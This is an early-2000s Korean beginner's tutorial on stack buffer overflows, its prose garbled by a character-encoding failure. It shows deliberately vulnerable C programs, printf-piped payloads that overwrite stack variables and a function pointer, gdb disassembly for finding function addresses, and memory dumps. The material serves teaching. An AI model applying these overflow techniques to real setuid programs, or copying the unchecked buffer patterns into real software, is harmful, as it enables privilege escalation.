�������� Null@Root BOF���ι濡�� ���ε� ������ �����Ѱ��Դϴ�.

********************************************
Null@Root BOF Study 
write by Anesra , aakkg@dreamwiz.com
http://null2root.new21.org
date 2001.06.20
********************************************

�� ������ Null@Root���� BOF���ι����� �����Ͽ��� BOF�� ����� gdb�� ������ 
���ؼ� �����Ѱ��Դϴ�.
�̰��� BOF�� �ʺ��ڵ��� ���Ѱ����� �� ������ ���ð� �ƹ��ɷ� BOF�� ���信 ���ؼ�
���� �����ñ� �ٶ��ϴ�. 

-����-----------------------------------------------
1.  ����1, ����2  // BOF�� ����?

2.  ����3 // �޸��� �����

3.  ����4 // gdb�� Ȱ���� �Լ��ּ� ã��
----------------------------------------------------

1.  ����1, ����2  // BOF�� ����?


BOF�� Buffer OverFlow �� ���ڷ� ���״�� ���۸� ��ġ�� �ؼ� �����ϴ� ���Դϴ�.
�׷��ٸ� ���۶��� �����ϱ��?
�޸� ������ �� ����ٺ���
----------------------------------�޸��ּ��� ������ :A
����:                     
            ��޸��ڶ�¹��� //���⼱ �Ʒ����� ���� �ڶ��ϴ�.

---------------------------------- :B
������:
            �� �޸��ڶ�¹���

----------------------------------
DATA����:
            �� �޸��ڶ�¹���

----------------------------------

Text����:      �� �޸��ڶ�¹���

==================================�޸��ּ��� ������ 

�ٽ� ���ð����� ���ٸ� A�� B�� �����

-----------------------------B
����
       �� �޸��ڶ�¹���

-----------------------------A

�̷��� �˴ϴ� �����̶��� LIFO(Last In First Out) ó��
�׸��� ���� ������ó�� �������� ������ ÷���� ���ɴϴ�.

���� ���α׷��� �ѹ� ���ô�.

Bof1.c

#include<unistd.h>
#include<stdio.h>

main()
{
char buf2[20]; //����2������ 20����Ʈ�� ���
char buf[20]; //������ ������ 20����Ʈ�� ����

fgets(buf,40,stdin);           //ǥ���Է����� ���ۿ� 40����Ʈ���� �Է��� ������ ����
if (!strcmp(buf2, "Angel\n"))  //buf2�� ��Ʈ���� Angel�̶����ڰ� ��ġ�� ���
{
 setreuid(999,999);          //�۹̼��� �ְ�

 system("whoami");           //���� �����Ŵ
}

}

���⼭ ���� �ڵ�� ó���� ���ǵȰ��� ������ �Ʒ��������� �������� ���Դϴ�.
�� ������ ������ ����

----------------------------B
buf[20]    ����� ����
----------------------------
buf2[20]
============================A
�̷��� �޸� �����ӿ� ���°��Դϴ�.

�׸��� �츮�� �Է��� �ϸ� buf���� ������
�׷��� buf�� ������ 20����Ʈ�ε� �װ� �Ѱ� �Է��ϸ� �������� ������?

�ٷ� buf2�� �������� ħ���ؼ� ���°��Դϴ�.

���� ������ ����������
B-buf[20]-bu2[20] -A����
012345678901234567890
�Է��� �ϸ�
buf[12345678901234567890] - buf2[20] 
�̷��� ���� ���Դϴ�.

�׷� ������ �ѹ� ���۸� ������ ���ڽ��ϴ�.
�׸��� ������ �����ڵ带 �ؼ� �޸��� ������ �����մϴ�.

#include<unistd.h>
#include<stdio.h>
#include"dumpcode.h"

main()
{
char buf2[20];                 //����2������ 20����Ʈ�� ���
char buf[20];                  //������ ������ 20����Ʈ�� ����
dumpcode((char*)buf,50);       //�Է��ϱ� ���� �޸� ����
printf("buf2:%x, buf:%x\n", &buf2,&buf); //buf2�� buf�� �޸� �ּҸ� �˾Ƴ��ϴ�.
fgets(buf,40,stdin);           //ǥ���Է����� ���ۿ� 40����Ʈ���� �Է��� ������
����
if (!strcmp(buf2, "Angel\n"))  //buf2�� ��Ʈ���� Angel�̶����ڰ� ��ġ�� ���
{
 setreuid(999,999);          //�۹̼��� �ְ�

 system("whoami");           //���� �����Ŵ
}
dumpcode((char*)buf,50);       //�Է��ϰ� �� �ڿ� �޸� ��
}
~

���� �ҽ��� ������ �ҽ��Դϴ�. ���ø� dumpcode.h������ �߰��Ǿ���
dumpcode((char*)buf,50); �� �߰��Ǿ����ϴ�.
�̰��� �޸𸮸� �����ؼ� ��Ȳ�� �����ִ°��Դϴ�.
�ڿ� 50�� �󸶸�ŭ ���¸� �����ٲ��� �ϴ� ���� ��Ÿ���ϴ�.

�׷� ���� �ѹ� �����غ��ô� .!

[null2root@Hacker .Anesra]$ gcc bof1.c -o bof1
[null2root@Hacker .Anesra]$ ./bof1
0xbffffc60  88 fc ff bf 70 a9 00 40 5b a5 0f 40 1c 98 04 08   ....p..@[..@....
0xbffffc70  60 ae 00 40 d4 fc ff bf 88 fc ff bf eb 84 04 08   `..@............
0xbffffc80  08 98 04 08 1c 98 04 08 a8 fc ff bf cb 29 03 40   .............).@
0xbffffc90  01 00                                             ..
buf2:bffffc74, buf:bffffc60    //�����ϸ� ���⼭ ���߰� �Է��� ��ٸ��ϴ�.

aaaaaaaaaa //aaaaaaaaa��� �Է��ϰ� ���͸� Ĩ�ϴ�.
0xbffffc60  61 61 61 61 61 61 61 61 61 61 0a 00 1c 98 04 08   aaaaaaaaaa......
0xbffffc70  60 ae 00 40 d4 fc ff bf 88 fc ff bf eb 84 04 08   `..@............
0xbffffc80  08 98 04 08 1c 98 04 08 a8 fc ff bf cb 29 03 40   .............).@
0xbffffc90  01 00                                             ..
[null2root@Hacker .Anesra]$

���⼭ ���ø� buf2�� buf�� ��Ȯ�� 20����Ʈ�� ���̳��°� ���� �ֽ��ϴ�.
buf2:bffffc74 buf:bffffc60  //�̰��� 16�����̱� ������ 20����Ʈ�� ���̰� ���ϴ�.
�׷� ���� buf�� 20����Ʈ�� �ƹ��ų� ����ְ� buf2�� �ٰ� Angel�̶�� ��Ʈ���� �Է��غ��ô�.

[null2root@Hacker .Anesra]$ ./bof1
0xbffffc60  88 fc ff bf 70 a9 00 40 5b a5 0f 40 1c 98 04 08   ....p..@[..@....
0xbffffc70  60 ae 00 40 d4 fc ff bf 88 fc ff bf eb 84 04 08   `..@............
0xbffffc80  08 98 04 08 1c 98 04 08 a8 fc ff bf cb 29 03 40   .............).@
0xbffffc90  01 00                                             ..
buf2:bffffc74, buf:bffffc60
0123456789abcdef0123Angel //���⿡ 20����Ʈ�� buf�� ����ְ� buf2���ٰ�Angel�̶� ��Ʈ���� �Է�
null2root                 //<= ���⼭ ���� �ڵ忡�� ������ system("whoami")�� ����Ȱ��� ���� �ֽ��ϴ�.
0xbffffc60  30 31 32 33 34 35 36 37 38 39 61 62 63 64 65 66   0123456789abcdef
0xbffffc70  30 31 32 33 41 6e 67 65 6c 0a 00 bf eb 84 04 08   0123Angel.......
0xbffffc80  08 98 04 08 1c 98 04 08 a8 fc ff bf cb 29 03 40   .............).@
0xbffffc90  01 00  //��Ȯ�ϰ� buf2�� �ּҿ� Angel�̶� ��Ʈ���� ���� ������ �ֽ��ϴ�.                                             ..
[null2root@Hacker .Anesra]$

-----------------------------------------------------------------------------------------
������ �ι�° BOF�� ������ ���ô�.
#include<stdio.h>
#include"dumpcode.h"  //dumpcode.h������ �߰����� �޸𸮰� �����Ǵ»�Ȳ�� �����Ѵ�.

main()
{
int crap;
int check;
char buf[20];
dumpcode((char*)buf,50);   //�޸𸮸� 50����Ʈ�� �����ڵ��ؼ� �����Ѵ�. �Է¹ޱ������� �޸𸮻���
fgets(buf,50,stdin);       //ǥ���Է����� 50����Ʈ�� �Է¹޴´�.
if(check==0xdeadbeef)      //check������ ���� 0xdeadbeef�� ���� �����ÿ� ���������ϰ��Ѵ�.
{
setreuid(999,999);
system("whoami");
}
printf("\ncrap:%x, check:%x, buf:%x\n",&crap,&check,&buf); //check�������ּҿ� buf�� �ּҸ� Ȯ���Ѵ�.
dumpcode((char*)buf,50);   //�Է¹������� �޸� ���¸� Ȯ���Ѵ�.
}

�̷��� �Ǹ� ���û� �Ʒ��� �׸��� ���� ���ϴ�.

----------------------B
buf[20]
----------------------
check
----------------------
crap
======================A
�׷��ѹ� �����غ��ô�.
[null2root@Hacker .Anesra]$ ./bof2
0xbffffc6c  e0 97 04 08 60 ae 00 40 d4 fc ff bf 88 fc ff bf   ....`..@........
0xbffffc7c  bb 84 04 08 cc 97 04 08 e0 97 04 08 a8 fc ff bf   ................
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38                                             h8
aaaaaaaaaa   //�Է¹ޱ����� �޸𸮱��� �� �Է��Ѱ�

crap:bffffc84, check:bffffc80, buf:bffffc6c //�������� �ּ�
0xbffffc6c  61 61 61 61 61 61 61 61 61 61 0a 00 88 fc ff bf   aaaaaaaaaa......
0xbffffc7c  bb 84 04 08 cc 97 04 08 e0 97 04 08 a8 fc ff bf   ................
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38                                             h8
          //aaaaaaaaaa�� �Է������� �޸� ����
[null2root@Hacker .Anesra]$

���⿡�� ���� �� ����
-----------------------B
buf[20]                0xbffffc6c
-----------------------
check                  0xbffffc80
-----------------------
crap                   0xbffffc84
=======================A 

���� Ȯ���� �޸� �ּ��� ���¸� �����ϽǼ� �ց���?

�׷��ٸ� ���� check�� ���� 0xdeadbeef�� �ٲ���� �ϴ� ������ �����ֽ��ϴ�.
�̶������� �Է��ϸ� �װ��� ASCII�ڵ帣 �ٲ� ��Ÿ���µ�(������� a�� �Է��ϸ� 61�̶�� ASCII��
��Ÿ���µ� ���� ���� �޸𸮿� ASCII�ڵ带 ����־���� �մϴ�.

�� 20����Ʈ���� buf�� ������������� check�� ����ġ�� �ּ��� �����ٰ� 0xdaedbeef�� 
����־���� �մϴ�.
�׸��� ����־� �ٶ��� 0x�� ���� deadbeef�� �ڿ��� ���� 2���� ©�� ���ٷ� ����־���մϴ�.
�� de ad be ef �� ������ �ȵǰ�  ef be ad de�� �־���� �մϴ�.
������ �޸� ������ �˾ƾ��ϴµ� �������� �����Ͻôٺ��� �����ϽǼ� �������ϴ�.

�׷� �������� ���� ��� 20����Ʈ �ڿ� ef be ad de�� ����ִ°� �ϴ¹���
���� ������ ���α׷��� �����ؼ� ���� �־��µ� ���� �ٷ� �Է��ϴ°� �˾ƾ� �մϴ�.

�׷� �ѹ� �Ʒ� ���ɾ ���ʽÿ�

[null2root@Hacker .Anesra]$ (printf "aaaaaaaaaa";cat)|./bof2
0xbffffc6c  e0 97 04 08 60 ae 00 40 d4 fc ff bf 88 fc ff bf   ....`..@........
0xbffffc7c  bb 84 04 08 cc 97 04 08 e0 97 04 08 a8 fc ff bf   ................
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38                                             h8
//�Է��ϱ����� �޸� ����

crap:bffffc84, check:bffffc80, buf:bffffc6c
0xbffffc6c  61 61 61 61 61 61 61 61 61 61 0a 00 88 fc ff bf   aaaaaaaaaa......
0xbffffc7c  bb 84 04 08 cc 97 04 08 e0 97 04 08 a8 fc ff bf   ................
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38                                             h8
//���ɾ� ���¿��� �ٷ� �Է��ѵڿ� �޸� ����

������ (printf "aaaaaaaaaa";cat)|./bof2 �� ������ printf�� aaaaaaaaaaa�� �Է��ϰ�
�װ��� cat���� |(������) �� ������ �Է��� �������� ������� ����°��Դϴ�.
�� (printf "aaaaaaaaaa";cat) �� ./bof2�� �Է��϶�� ���Դϴ�.

�޸𸮰� ������ Ȯ���Ҽ� �ֽ��ϴ�. �׸��� ������ �� check�� buf�� �ּҸ� ����
��Ȯ�ϰ� 20����Ʈ ���������� �˼��ֽ��ϴ�.

����:
check��buf�� �ּҰ� ��Ȯ�ϰ� 20����Ʈ�� �������µ� 
gcc 2.96���� �ö󰡸鼭 �߰��� ����������� ����� �Ǿ����ϴ�.
�� ÷�� �Ҷ� 20����Ʈ�� �ƴ϶� 40����Ʈ�� �������־ ��������ֽ��ϴ�.
��¶�� �޸� �ּҸ�ŭ �Է��ѵڿ� check�� �ش��ϴ� �ּҿ��� ���� ���� �־��ָ� �˴ϴ�.
*���� ��:

�׷� ���� 0xdeadbeef�� �־�ô�.
[null2root@Hacker .Anesra]$ (printf "12345678901234567890\xef\xbe\xad\xde";cat)
|./bof2    //�޸𸮿� ���������� \x�� �̷��� �־���� �մϴ�.
0xbffffc6c  e0 97 04 08 60 ae 00 40 d4 fc ff bf 88 fc ff bf   ....`..@........
0xbffffc7c  bb 84 04 08 cc 97 04 08 e0 97 04 08 a8 fc ff bf   ................
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38                                             h8
          //�Է��ϱ� ���� �޸𸮻���
null2root    //��Ȯ�ϰ� �����ѵڿ� system("whoami");�� ������ ��

crap:bffffc84, check:bffffc80, buf:bffffc6c
0xbffffc6c  31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36   1234567890123456
0xbffffc7c  37 38 39 30 ef be ad de 0a 00 04 08 a8 fc ff bf   7890............
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38                                             h8
          // ���⿡�� ���ø� 0xbffffc7c  37 38 39 30 ef be ad de 
                                                     ----------- ������ �˼��ֽ��ϴ�.
[null2root@Hacker .Anesra]$
-----------------------------------------------------------------------------------------
2.  ����3 // �޸��� �����



�׷� ���� �ٸ� ������ ���ڽ��ϴ�.

[null2root@Hacker .Anesra]$ cat bof3.c
#include<stdio.h>
#include"dumpcode.h"
main()
{
int crap;
int *check;
char buf[20];
dumpcode((char*)buf,16*5);
fgets(buf,16*5,stdin);
if(*check==0xdeadbeef)
{
setuid(999,999);
system("whoami");
}
printf("\ncrap:%x, *check:%x, buf:%x\n", &crap,&(check),&buf);
dumpcode((char*)buf,16*5);
}

���⼭ �߿��Ѱ� �����Ͱ���
�����ʹ� �ּҸ� ������ ������ �ִٴ°��� �˾Ƶμž� �մϴ�.

�׷� �����ؼ� �ѹ� �޸𸮻��¸� �˾ƺ���������
[null2root@Hacker .Anesra]$ ./bof3
0xbffffc6c  d0 97 04 08 60 ae 00 40 d4 fc ff bf 88 fc ff bf   ....`..@........
0xbffffc7c  ab 84 04 08 bc 97 04 08 d0 97 04 08 a8 fc ff bf   ................
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38 01 40 01 00 00 00 10 84 04 08 00 00 00 00   h8.@............
0xbffffcac  31 84 04 08 a4 86 04 08 01 00 00 00 d4 fc ff bf   1...............

aaaaaaaaaaaaa

crap:bffffc84, *check:bffffc80, buf:bffffc6c
0xbffffc6c  61 61 61 61 61 61 61 61 61 61 61 61 61 0a 00 bf   aaaaaaaaaaaaa...
0xbffffc7c  ab 84 04 08 bc 97 04 08 d0 97 04 08 a8 fc ff bf   ................
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38 01 40 01 00 00 00 10 84 04 08 00 00 00 00   h8.@............
0xbffffcac  31 84 04 08 a4 86 04 08 01 00 00 00 d4 fc ff bf   1...............

[null2root@Hacker .Anesra]$
���⿡�� �� ���ø� check�� ����Ű�� �ּҰ� bffffc80���� �˼��ֽ��ϴ�.
0xbffffc80  bc 97 04 08 �̺κ����� �˼� �ֽ��ϴ�.
���� ���κ��� 0xdeadbeef�� ����ִ� �ּҷ� �ٲ��־�� �մϴ�.

�� �Ʒ��� ���� A�� 16�������Ŀ� deadbeef���� �޸𸮿� �ְ� �׸޸𸮹�����
check�� ����Ű�� �ϸ� �˴ϴ�.

[null2root@Hacker .Anesra]$ (printf "AAAAAAAAAAAAAAAA\xef\xbe\xad\xde\x7c\xfc\x
ff\xbf";cat)|./bof3
0xbffffc6c  d0 97 04 08 60 ae 00 40 d4 fc ff bf 88 fc ff bf   ....`..@........
0xbffffc7c  ab 84 04 08 bc 97 04 08 d0 97 04 08 a8 fc ff bf   ................
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38 01 40 01 00 00 00 10 84 04 08 00 00 00 00   h8.@............
0xbffffcac  31 84 04 08 a4 86 04 08 01 00 00 00 d4 fc ff bf   1...............


null2root

crap:bffffc84, *check:bffffc7c, buf:bffffc6c
0xbffffc6c  41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41   AAAAAAAAAAAAAAAA
0xbffffc7c  ef be ad de 7c fc ff bf 0a 00 04 08 a8 fc ff bf   ....|...........
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38 01 40 01 00 00 00 10 84 04 08 00 00 00 00   h8.@............
0xbffffcac  31 84 04 08 a4 86 04 08 01 00 00 00 d4 fc ff bf   1...............

[null2root@Hacker .Anesra]$
�׷� ���� ���� ����Ȱ��� ���� �ֽ��ϴ�.

------------------------------------------------------------------

3.  ����4 // gdb�� Ȱ���� �Լ��ּ� ã��


�̹��� gdb�� ����ؼ� �Լ��� �����ּҸ� �̿��ϴ� ���� �غ��ô�.

�ҽ��� �Ʒ��� �����ϴ�.
---bof4.c-------------------
[null2root@Hacker .Anesra]$ cat bof4.c
#include<stdio.h>
#include"dumpcode.h"

void shell()
{
setreuid(999,999);
system("whoami");
printf("congratulations! Success \n");
}

void printit()
{
printf("general program!\n");
}

main()
{
int crap;
void (*call)()=printit;
char buf[20];
fgets(buf,80,stdin);
dumpcode((char*)buf,100);
call();
}

[null2root@Hacker .Anesra]$

�� ���α׷��� ��� ���ܸԾ����� �ѹ� �����غ��ô�.

[null2root@Hacker .Anesra]$ ./bof4
aaaaaaaaaaaa
0xbffffc6c  61 61 61 61 61 61 61 61 61 61 61 61 0a 00 ff bf   aaaaaaaaaaaa....
0xbffffc7c  bb 84 04 08 e8 86 04 08 00 98 04 08 a8 fc ff bf   ................
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38 01 40 01 00 00 00 20 84 04 08 00 00 00 00   h8.@.... .......
0xbffffcac  41 84 04 08 fc 86 04 08 01 00 00 00 d4 fc ff bf   A...............
0xbffffcbc  54 83 04 08 6c 87 04 08 60 ae 00 40 cc fc ff bf   T...l...`..@....
0xbffffccc  90 3e 01 40                                       .>.@
general program!           //printit()�Լ� ȣ���� ���.
[null2root@Hacker .Anesra]$

�츮�� shell()�Լ��� ȣ���Ͽ��� �մϴ�.

�� ���ο��� printit()�Լ��� ȣ������ ���� shell()�Լ��� ȣ���ϰԲ� ���α׷��� �ǵ����
�մϴ�..
�󸶳� ����ִ� ���Դϴ�.�츮�� ���α׷��� ������� �ǵ�� �ִٴ°�..^^;

�׷� �ѹ� �غ��ô�.
�켱 �� �Լ��� ���� �ּҸ� �˾ƾ� �մϴ�.
���⼭ gdb�� ����Ͽ� �Լ��� �����ּҸ� �˾ƺ��ϴ�.

gdb������ ������ �����ϴ�.
[null2root@Hacker .Anesra]$ gdb bof4    //gdb�ϰ� �������α׷��� �����ϴ�.
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb)
���⼭

disassemble main
�غ��ô�.
(gdb) disassemble main
Dump of assembler code for function main:
0x80486fc <main>:       push   %ebp
0x80486fd <main+1>:     mov    %esp,%ebp
0x80486ff <main+3>:     sub    $0x1c,%esp
0x8048702 <main+6>:     push   %ebx
0x8048703 <main+7>:     movl   $0x80486e8,0xfffffff8(%ebp)
0x804870a <main+14>:    mov    0x80498d0,%eax
0x804870f <main+19>:    push   %eax
0x8048710 <main+20>:    push   $0x50
0x8048712 <main+22>:    lea    0xffffffe4(%ebp),%eax
0x8048715 <main+25>:    push   %eax
0x8048716 <main+26>:    call   0x80483d4 <fgets>
0x804871b <main+31>:    add    $0xc,%esp
0x804871e <main+34>:    push   $0x64
0x8048720 <main+36>:    lea    0xffffffe4(%ebp),%eax
0x8048723 <main+39>:    push   %eax
0x8048724 <main+40>:    call   0x8048514 <dumpcode>
0x8048729 <main+45>:    add    $0x8,%esp
0x804872c <main+48>:    mov    0xfffffff8(%ebp),%ebx
0x804872f <main+51>:    call   *%ebx
0x8048731 <main+53>:    mov    0xffffffe0(%ebp),%ebx
0x8048734 <main+56>:    leave
0x8048735 <main+57>:    ret
0x8048736 <main+58>:    nop
---Type <return> to continue, or q <return> to quit---

���...�Ӱ� ���̵� �����׿�..����ڵ嵵 ���̱���
���⼭ ������ ���� �Ұ���
printit()�Լ��� ȣ���ϴ� �κ�
0x8048703 <main+7>:     movl   $0x80486e8,0xfffffff8(%ebp)
�� �ߺ����� Ư�� 0x80486e8�� ����ϼ���

�׷� ���� shell()�Լ��� gdb�� ���ô�.
(gdb) disassemble shell
Dump of assembler code for function shell:
0x80486b4 <shell>:      push   %ebp
0x80486b5 <shell+1>:    mov    %esp,%ebp
0x80486b7 <shell+3>:    push   $0x3e7
0x80486bc <shell+8>:    push   $0x3e7
0x80486c1 <shell+13>:   call   0x8048404 <setreuid>
0x80486c6 <shell+18>:   add    $0x8,%esp
0x80486c9 <shell+21>:   push   $0x80487ab
0x80486ce <shell+26>:   call   0x80483b4 <system>
0x80486d3 <shell+31>:   add    $0x4,%esp
0x80486d6 <shell+34>:   push   $0x80487b2
0x80486db <shell+39>:   call   0x80483f4 <printf>
0x80486e0 <shell+44>:   add    $0x4,%esp
0x80486e3 <shell+47>:   leave
0x80486e4 <shell+48>:   ret
0x80486e5 <shell+49>:   lea    0x0(%esi),%esi
End of assembler dump.
(gdb)
��...���⼭ shell()�Լ��� �����ּҰ� 0x80486b4�ΰ� ���� �ֽ��ϴ�.

�׸��� ���������� ���� printit()�Լ��� �����ϰ���
(gdb) disassemble printit
Dump of assembler code for function printit:
0x80486e8 <printit>:    push   %ebp
0x80486e9 <printit+1>:  mov    %esp,%ebp
0x80486eb <printit+3>:  push   $0x80487cd
0x80486f0 <printit+8>:  call   0x80483f4 <printf>
0x80486f5 <printit+13>: add    $0x4,%esp
0x80486f8 <printit+16>: leave
0x80486f9 <printit+17>: ret
0x80486fa <printit+18>: mov    %esi,%esi
End of assembler dump.
(gdb)
��...��� printit()�Լ��� �����ּҰ�
0x80486e8�̳׿� .�̰� �����Լ����ִ� �ּҿ���.��ﳪ����?

�׷� �� �ּ�(0x80486e8)�� shell()�Լ��ǽ����ּ��� (0x80486b4)���� �ٲپ��ָ�
�������α׷��� �ٺ����� printit()�Լ��� ȣ������ �ʰ� shell()�Լ��� ȣ���ϰ���?

�׷� �ѹ� �޸� ������ �����ô�~
(gdb) q
[null2root@Hacker .Anesra]$ ./bof4

0xbffffc6c  0a 00 04 08 60 ae 00 40 d4 fc ff bf 88 fc ff bf   ....`..@........
0xbffffc7c  bb 84 04 08 e8 86 04 08 00 98 04 08 a8 fc ff bf   ................
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38 01 40 01 00 00 00 20 84 04 08 00 00 00 00   h8.@.... .......
0xbffffcac  41 84 04 08 fc 86 04 08 01 00 00 00 d4 fc ff bf   A...............
0xbffffcbc  54 83 04 08 6c 87 04 08 60 ae 00 40 cc fc ff bf   T...l...`..@....
0xbffffccc  90 3e 01 40                                       .>.@
general program!
[null2root@Hacker .Anesra]$

���⼭ 
0xbffffc7c  bb 84 04 08 e8 86 04 08 �̺κ��� �� ���ø� 

0xbffffc80�κк��� e8 86 04 08(=0x80486e8)�ΰ��� �˼��ֽ��ϴ�.
�̺κ��� ���� b4 86 04 08(=0x80486b4)�� �ٲ��ָ� ���� ��û�� main()�Լ���
�츮�� �ǵ��ߴ����� shell()�Լ��� ȣ���ϰ���~

�׷� ���������� �ѹ� ������ �غ��ô�.

[null2root@Hacker .Anesra]$ (printf "12345678901234567890\xb4\x86\x04\x08";cat)
|./bof4

0xbffffc6c  31 32 33 34 35 36 37 38 39 30 31 32 33 34 35 36   1234567890123456
0xbffffc7c  37 38 39 30 b4 86 04 08 0a 00 04 08 a8 fc ff bf   7890............
0xbffffc8c  cb 29 03 40 01 00 00 00 d4 fc ff bf dc fc ff bf   .).@............
0xbffffc9c  68 38 01 40 01 00 00 00 20 84 04 08 00 00 00 00   h8.@.... .......
0xbffffcac  41 84 04 08 fc 86 04 08 01 00 00 00 d4 fc ff bf   A...............
0xbffffcbc  54 83 04 08 6c 87 04 08 60 ae 00 40 cc fc ff bf   T...l...`..@....
0xbffffccc  90 3e 01 40                                       .>.@
null2root
congratulations! Success

[null2root@Hacker .Anesra]$

��~~~~ �嵮 �����Լ��� printit()�� ȣ������ �ʰ� shell()�Լ��� ȣ���Ѱ��� ���� �ֽ��ϴ�.
�Լ��� �帧�� �ٲ��������~~

������� BOF�� ����� ������ BOF���α׷� �׸��� gdb�� ������ ���ؼ� �˾ƺ��ҽ��ϴ�.

�ƹ��ɷ� BOF�� ������ �����ϼ̱� �ٶ�� �̸� .
������ �����Ͻñ� �ٶ��ϴ�.


*÷�� dumpcode.h

[null2root@Hacker .Anesra]$ cat dumpcode.h
void printchar(unsigned char c)
{
     if(isprint(c))
             printf("%c",c);
     else
             printf(".");
}
void dumpcode(unsigned char *buff, int len)
{
     int i;
     for(i=0;i<len;i++)
     {
             if(i%16==0)
                     printf("0x%08x  ",&buff[i]);
             printf("%02x ",buff[i]);
             if(i%16-15==0)
             {
                     int j;
                     printf("  ");
                     for(j=i-15;j<=i;j++)
                             printchar(buff[j]);
                     printf("\n");
             }
     }
     if(i%16!=0)
     {
             int j;
             int spaces=(len-i+16-i%16)*3+2;
             for(j=0;j<spaces;j++)
                     printf(" ");
             for(j=i-i%16;j<len;j++)
                     printchar(buff[j]);
     }
     printf("\n");
}